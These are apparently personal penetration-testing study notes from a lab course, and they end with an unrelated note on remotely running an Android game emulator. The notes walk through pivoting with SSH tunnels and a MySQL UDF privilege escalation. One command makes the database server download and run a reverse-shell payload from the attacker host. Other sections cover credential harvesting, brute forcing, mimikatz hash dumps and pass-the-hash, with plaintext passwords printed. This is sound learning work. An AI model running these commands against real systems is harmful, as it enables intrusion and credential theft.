/** MySQL database username */
define( 'DB_USER', 'wp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Lv9EVQq86cfi8ioWsqFUQyU' );

/** MySQL hostname */
define( 'DB_HOST', '10.5.5.11' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HTTP_BLOCK_EXTERNAL', true );

Creating a stable pivot point

when then try to login to the internal network, e.g. the database server 10.5.5.11
since we do not have root access to create ssh server, we should use reverse ssh tunneling

first we need to know which port is running the database server

create a quick portscan script

1
2
3
4
5
6
7
#!/bin/bash
host=10.5.5.11
for port in {1..65535}; do
    timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
    echo "port $port is open"
done
echo "Done"

upload the script use meterpreter:

1
2
3
4
5
upload ~/script/portscan.sh /tmp/portscan.sh 

chmod +x portscan.sh
./portscan.sh
port 3306 is open

default mariadb port is also 3306

1
ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 kali@192.168.119.165

but it will prompt us for 1. accept hostkey, 2. password

1
ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@192.168.119.165

UserKnownHostsFile do not save host keys
StrictHostKeyChecking do not prompt

to avoid the prompt for password, we generate ssh key on target machine 

1
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBK2RDq8McGN6Av2gpVYvS6nwi6r10XFYVQsQAxQLDwaprw4pJObKgcpgXkgj48cSLCJ8473Jv3y8FUpqgN8sX3EJseG43ni45kP/i3yQJ7sTmbG6/ZsIdxZM4dC9oK9JbHTnko/8d24lJMxAGwvskjFpCRjcBu1OVUmRziWFTG5v6zVaebvFt2DlP3XaDPZysZg4+Xh5iS+/T73aarEJbLz5EEz7Nnq06bHvMOn/hQqqiIZ6jgHVzSMu7eolt1hh7+CsCjaNctURir4JRCAMjEWmpQ+xy39b6PmqDLbJfKon68Xv685fB6d+O2vJr/lO8KaKEnhEUwRw5GwN45hRT www-data@ajla

in kali’s authorized_keys

1
2
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDBK2RDq8McGN6Av2gpVYvS6nwi6r10XFYVQsQAxQLDwaprw4pJObKgcpgXkgj48cSLCJ8473Jv3y8FUpqgN8sX3EJseG43ni45kP/i3yQJ7sTmbG6/ZsIdxZM4dC9oK9JbHTnko/8d24lJMxAGwvskjFpCRjcBu1OVUmRziWFTG5v6zVaebvFt2DlP3XaDPZysZg4+Xh5iS+/T73aarEJbLz5EEz7Nnq06bHvMOn/hQqqiIZ6jgHVzSMu7eolt1hh7+CsCjaNctURir4JRCAMjEWmpQ+xy39b6PmqDLbJfKon68Xv685fB6d+O2vJr/lO8KaKEnhEUwRw5GwN45hRT www-data@ajla

in shell:

1
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.119.165

-f run in background

Targeting the database

1
2
mysql --host=127.0.0.1 --port=13306 --user=wp -p 
Lv9EVQq86cfi8ioWsqFUQyU

look at what privilege we have:

1
2
3
SHOW Grants;
GRANT USAGE ON *.* TO 'wp'@'%' IDENTIFIED BY PASSWORD '*61163AE4B131AB0E43F07BE7B' |
GRANT SELECT, INSERT, UPDATE, DELETE ON `wordpress`.* TO 'wp'@'%'
1
2
3
4
5
6
7
8
MariaDB [(none)]> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
+------------+----------+-----------------+---------------------------+-------------------+
| @@hostname | @@tmpdir | @@version       | @@version_compile_machine | @@plugin_dir      |
+------------+----------+-----------------+---------------------------+-------------------+
| zora       | /var/tmp | 10.3.20-MariaDB | x86_64                    | /home/dev/plugin/ |
+------------+----------+-----------------+---------------------------+-------------------+
1 row in set (0.026 sec)

1
searchsploit maria

non of the exploit work for current version of maria

search for more generic mysql exploit, since maria is built on mysql

1
searchsploit mysql

UDF user-defined function show up often???? how did you get here?

find an interesting github repo:

1
git clone https://github.com/mysqludf/lib_mysqludf_sys.git

to compile, install some packages:

1
sudo apt update && sudo apt install default-libmysqlclient-dev libmariadbd-dev

modify make file, to make it include maria’s header file. hmmmm..

output so to shellcode:

1
xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex

tr -d delete;
xxd dump to hex

1
2
3
4
mariadb> set @shell=0x7abf.....;
select @@plugin_dir; 
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';

We get error since wp does not have permission to write file

go back to ajla to see if we can find root credentials

Deeper Enumeration of the Web Application Server

1
searchsploit ubuntu 16.04

find a good local privelege escalation script
compile locally and upload to ajla, we get the root

then we add our ssh pubkey to root

then we can ssh root@sandbox.local to the ajla

search for DB credentials

inspect .bash_history, find:
mysql -u root -pBmDu9xUHKe3fZi3Z7RdMBeb -h 10.5.5.11 -e 'DROP DATABASE wordpress;'

Targeting the database again

1
2
3
4
5
6
mysql --host=127.0.0.1 --port=13306 --user=root -pBmDu9xUHKe3fZi3Z7RdMBeb
mariadb> set @shell=0x7abf.....;
select @@plugin_dir; 
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
create function sys_exec returns int soname 'udf_sys_exec.so';
select * from mysql.func where name='sys_exec';

test to see if we can make network call from zora to kali

1
kali> sudo python3 -m http.server 80

let zora grab our shell.elf

1
2
select sys_exec('wget http://192.168.119.165/shell.elf');
select sys_exec('chmod +x ./shell.elf');

make sure metasploit is ready for the connection

1
2
3
4
5
6
exit # exit root shell
exit # exit shell
exit
run

select sys_exec('./shell.elf');

get the shell of mysql user

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
cat /etc/issue # get linux version
Alpine Linux 3.10

cat /proc/version # get kernel version
Linux version 4.19.78-0-virt (buildozer@build-3-10-x86_64) (gcc version 8.3.0 (Alpine 8.3.0)) #1-Alpine SMP Thu Oct 10 15:25:30 UTC 2019

uname -a
linux zora 4.19.78-0-virt #1-Alpine SMP Thu Oct 10 15:25:30 UTC 2019 x86_64 Linux

env

ps ux

netstat -tulpn

cat /etc/fstab

UUID=ede2f74e-f23a-441c-b9cb-156494837ef3	/	ext4	rw,relatime 0 1
UUID=8e53ca17-9437-4f54-953c-0093ce5066f2	/boot	ext4	rw,relatime 0 2
UUID=ed8db3c1-a3c8-45fb-b5ec-f8e1529a8046	swap	swap	defaults	0 0
/dev/cdrom	/media/cdrom	iso9660	noauto,ro 0 0
/dev/usbdisk	/media/usb	vfat	noauto	0 0
//10.5.5.20/Scripts    /mnt/scripts    cifs    uid=0,gid=0,username=,password=,_netdev 0 0

The contents of /etc/fstab are interesting. A share is mounted from the 10.5.5.20 host. Let’s poke
around the scripts share and see what we find.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cd /mnt/scripts

cat system_report.ps1
# find a better way to automate this
$username = "sandbox\alex"
$pwdTxt = "Ndawc*nRoqkC+haZ"
$securePwd = $pwdTxt | ConvertTo-SecureString 
$credObject = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $securePwd

# Enable remote management on Poultry
$remoteKeyParams = @{
ComputerName = "POULTRY"
Path = 'HKLM:\SOFTWARE\Microsoft\WebManagement\Server'
Name = 'EnableRemoteManagement'
Value = '1' 
}
Set-RemoteRegistryValue @remoteKeyParams -Credential $credObject

Create a stable reverse tunnel

1
2
3
4
5
ssh-keygen
/var/lib/mysql/.ssh/id_rsa

from="10.11.1.250",command="echo 'This account can only be used for port
forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBVu1YocyTb1VTj7tkgBdqpqU/YQoKSTEC3btRPoWDs8s4oCkYNU4nuehdUn8NFeBPSABqrPq7oBu20jJVD+BWdsXUVkTqCeQr4iz1owud1GsE7QbkHiWXmkNjLqzDTnJqL9Tp1cSdIx7Ekwc9ETtQlmAaR3YRA0Ryd2JR1Mv8edE43Fhh9LGVeW/97hI6DeYOvA3+bODxd9hkqwnOyDqB5RzMEcu6q98sysp31QbiJ17LH1Rr5fkdUUmVZtdwlByu8heB5UrDW1UJUa0GoHmh/nzwxD6+9eazK/XNGp6/pOPhd2zag99IMMtTkypx6mguFYy3mIgkI/h5C46xJTOUz/xQ2LwGb8+PWmBXHDcnbL85y4p1yyoUM5oBd+Fb6DThYnKmwVtvUb0VrEcN03JZ9QepkvdE84eUzqBdbWBjTzhgHTLFRJeMQM2sUt7vBcOB2XmuTk3md/O8V7wQuSgXDk8vyz4h/iSCu8UaLJx0CnJ5AdtIUeIBzgFWf1hJnWE= mysql@zora

Dynamic port forwarding

1
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa kali@192.168.119.165

add to /etc/proxychains4.conf

1
socks4 127.0.0.1 1080

Targeting Poultry

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
proxychains nmap --top-ports=20 -sT -Pn 10.5.5.20
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   closed ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed domain
80/tcp   closed http
110/tcp  closed pop3
111/tcp  closed rpcbind
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
143/tcp  closed imap
443/tcp  closed https
445/tcp  open   microsoft-ds
993/tcp  closed imaps
995/tcp  closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp open   ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy

-sT TCP connect
-Pn no ping

port 3389 ms-wbt-server is the rdp server

login with the credential we have

1
proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard

/d: domain
/u: user
/v: server host

let me try rdesktop first

1
2
proxychains rdesktop 10.5.5.20 -d sandbox -u alex -p 'Ndawc*nRoqkC+haZ' -g 1024x768 -r clipboard:PRIMARYCLIPBOARD

1
2
3
4
5
6
7
8
9
10
11
C:\Users\alex>systeminfo
Host Name: POULTRY
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
...
Registered Owner: poultryadmin
...
Domain: sandbox.local

netstat -ano

nothing interesting for the opening port, Ports 49152 and above
are the Windows default dynamic/ephemeral ports for establishing TCP connections and we
don’t need to worry about them

check if alex is in admin group

1
2

Global Group memberships *Domain Users

it is a regular domain user

Study Notes - 2021/07/08|Study Notes-Penetration Testing

Http tunneling through deep packet inspection

Senario: only a specific protocal is allowed. E.g. ssh protocal is not allowed. and theres a deep packet inspection in the firewall that only allow http packet. An unused port 1234 is open by misconfiguration (unusal in real case)
port 3389 remote desktop prot

On compromised linux machine: 

1
ssh -L 0.0.0.0:8888:w.x.y.z:3389 student@127.0.0.1

it is not restricted since they both in the internal subnet

encapsulate the tunnel within http package

1
sudo apt install httptunnel

http tunnel is server-client based, on compromised linux:

1
student@debian:~$ hts --forward-port localhost:8888 1234

on kali:

1
kali@kali:~$ htc --forward-port 8080 10.11.0.128:1234
Study Notes - 2021/07/07|Study Notes-Penetration Testing

Port Forwarding

RINETD

Default configuration file: 

1
cat /etc/rinetd.conf

bind address, bind port: listening address/port connect address/port: destination 

1
2
# bindadress bindport connectaddress connectport
0.0.0.0 80 216.58.207.142 80

forword any connection to port 80 to google 

1
2
3
sudo service rinetd restart
ss -antp | grep "80"
nc -nvv 10.11.0.4 80

SSH Tunneling

SSH local port forwarding

Senario:
victim1 already compromised, only accpet 8080, 22, 3389 port from outside. victim1 conenct to another subnetwork contains another target. Move tools to victim1 is not eligent and scalable, want to attack from our kali machine 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-L local_socket:host:hostport
-L local_socket:remote_socket
             Specifies that connections to the given TCP port or Unix socket
             on the local (client) host are to be forwarded to the given host
             and port, or Unix socket, on the remote side.  This works by al‐
             locating a socket to listen to either a TCP port on the local
             side, optionally bound to the specified bind_address, or to a
             Unix socket.  Whenever a connection is made to the local port or
             socket, the connection is forwarded over the secure channel, and
             a connection is made to either host port hostport, or the Unix
             socket remote_socket, from the remote machine.

-N      Do not execute a remote command.  This is useful for just for‐
             warding ports.

1
2
3
4
5
6
7
8
In our scenario, we want to forward port 445 (Microsoft networking without NetBIOS) on our Kali
machine to port 445 on the Windows Server 2016 target. When we do this, any Microsoft file
sharing queries directed at our Kali machine will be forwarded to our Windows Server 2016 target.
This seems impossible given that the firewall is blocking traffic on TCP port 445, but this port
forward is tunneled through an SSH session to our Linux target on port 22, which is allowed
through the firewall. In summary, the request will hit our Kali machine on port 445, will be
forwarded across the SSH session, and will then be passed on to port 445 on the Windows Server
2016 target.
1
kali@kali:~$ sudo ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128

SSH Remote port forwarding

Senario:

the firewall is blocking inbound TCP port 22 (SSH) connections, so we can’t
SSH into this server from our Internet-connected Kali machine

1
victim1: ssh -N -R 10.11.0.4:2221:127.0.0.1:3306 kali@10.11.0.4

forword all 10.11.0.4:2221 request from kali machien to 127.0.0.1:3306

on kali:

1
2
3
4
5
6
kali@kali:~$ sudo nmap -sS -sV 127.0.0.1 -p 2221
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
PORT STATE SERVICE VERSION
2221/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

scan local port will scan target host

SSH Dynamic port forwarding

1
kali> ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>

With the above syntax in mind, we can create a local SOCKS4 application proxy (-N -D) on our
Kali Linux machine on TCP port 8080 (127.0.0.1:8080), which will tunnel all incoming traffic to
any host in the target network, through the compromised Linux machine, which we log into as
student

We can run any network application through HTTP, SOCKS4, and SOCKS5
proxies with the help of ProxyChains

add to /etc/proxychains.conf 

1
socks4 127.0.0.1 8080
1
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110

PLINK.exe

1
plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4

if it is the first time, it will attmpt to cache the host key and there’s a interactive step y/n

solution: 

1
cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4

netSH

use netsh to do port forwarding on windows, it is installed on windows by default.

However, for this to work, the Windows system must have the IP Helper service running and IPv6
support must be enabled for the interface we want to use. Fortunately, both are on and enabled
by default on Windows operating systems. 

1
2
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
netstat -anp TCP | find "4455"

By default, firewall does not allow inbound connection to 4455, however, we have system privilege, we can change the firewall configuration 

1
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

before using smbclient, smb need to be configured with min protocal level = smbv2 and restart 

1
2
3
4
5
6
/etc/samba/smb.conf
min protocol = SMB2


sudo /etc/init.d/smbd restart
smbclient -L 10.11.0.22 --port=4455 --user=Administrator
Study Notes - 2021/07/06|Study Notes-Penetration Testing

HTTP htaccess password attack with medusa

decompress the rockyou wordlist:

1
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
1
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

password Attack against Remote Desktop Protocal with crowbar

1
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

-n number of threads
-b protocal
-s host
-u username
-C wordlist

rdp does not reliably handle multiple threads, so we use single thread

SSH Attack with THC-Hydra

-l target username
-P wordlist
protocal://IP 

1
hydra -l kali -P test_wdlist.txt ssh://127.0.0.1

HTTP post attack with THC-Hydra

obtain addtional info about http-form-post options

1
2
3
hydra http-form-post -U 

<url>:<form parameters>:<condition string>[:<optional>[:<optional>]
1
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

request verbose output with -vV, and use -f to stop the attack when the first successful result is found.

Retrieve Password hashes

hashid <hashvalue> to identify hash type

inspect /etc/shadow file 

1
sudo grep root /etc/shadow
1
root:$6$18cMHZ.mB57eU82l$lim7jazX00mXUZEB43IOtlHmpFcuTrceOJ1QObdaGr5fwsfsEryh5xcuJEpH7qOyiOmQHcGkn33vhy66GQDAi1:18696:0:99999:7:::

the first of which ($6) references the SHA-512 algorithm

  • $1 = MD5 hashing algorithm.
  • $2 =Blowfish Algorithm is in use.
  • $2a=eksblowfish Algorithm
  • $5 =SHA-256 Algorithm
  • $6 =SHA-512 Algorithm
    18cMHZ.mB57eU82l the salt

SAM database cannot be copied while the operating system is running because the Windows kernel keeps an exclusive file system lock on the file.

mimikatz modules facilitate password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached.

1
2
3
4
C:\Tools\password_attacks\mimikatz.exe
> privilege::debug
> token::elevate
> lsadump::sam

token::elevate command to elevate the security token from high integrity (administrator) to SYSTEM integrity. If mimikatz is launched from a SYSTEM shell, this step is not required.

use lsadump::sam to dump the contents of the SAM database

Passing the hash in windows

The Pass-the-Hash (PtH) technique (discovered in 1997) allows an attacker to authenticate to a
remote target by using a valid combination of username and NTLM/LM hash rather than a clear
text password. This is possible because NTLM/LM password hashes are not salted and remain
static between sessions. Moreover, if we discover a password hash on one target, we cannot only
use it to authenticate to that target, we can use it to authenticate to another target as well, as long
as that target has an account with the same username and password.

Security Accounts Manager (SAM)

To do this, we will use pth-winexe from the Passing-The-Hash toolkit (a modified version of winexe), which performs authentication using the SMB protocol

1
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd

Question: what does “aad3b435b51404eeaad3b435b51404ee” do ? why there are two hashes?
aad3b435b51404eeaad3b435b51404ee: Empty LM HASH <LM hash>:<NTLM hash>

NTLM hash algorithn:

1
MD4(UTF-16-LE(password))

Behind the scenes, the format of the NTLM hash we provided was changed into a NetNTLM
version 1 or 2 format during the authentication process. We can capture these hashes using
man-in-the-middle or poisoning attacks and either crack them or relay them

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Password cracking

recover clear text password from hash 

1
john hash.txt --format=NT
1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
1
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

use john with linux password

1
2
3
4
grep victim /etc/passwd > test_pw.txt
sudo grep victim /etc/shadow > test_shadow.txt
unshadow test_pw.txt test_shadow.txt > test_unshadow.txt
john est_unshadow.txt

john need the unshadow format as input hash

I created a victim user, but the hash type is $y$ which can not be cracked

Arknights Remote Access|Project-Thoughts

Motivation

I played Arknights on Bilibili Server(Android only) with Android emulator, tries to clear some daily task with my iOS device.

Attempts

  • Approch 1: UI less arknights: need to capture and analyze some packages. I searched on github, all auto scripts are based on Android Emulator.
  • Approch 2: have an android emulator running on remote server, and control it with those auto scripts (CV based). However, it seems rented cloud VMs does not support nested virtualization (android emulator is another vm)
  • Approch 3 (Current approch): Run emulator on my own windows machine, connect both windows machine and mobile phone (or browser if provide a web based console) to the server. Drawback: access speed would be slow, since need to communicate with both web client and windows machine. Need to keep my own PC running at home while access it. Need authentication to avoid Man-in-the-middle attack. Tried to find a way directly connect two machines behind NAT (NAT Traversal)

Design - PC side

Connect Emulator with adb

Download android sdk platform tool (adb included), add to PATH

default adb server running on 127.0.0.1:5037

Mumu emulator

1
2
adb connect 127.0.0.1:7555
adb shell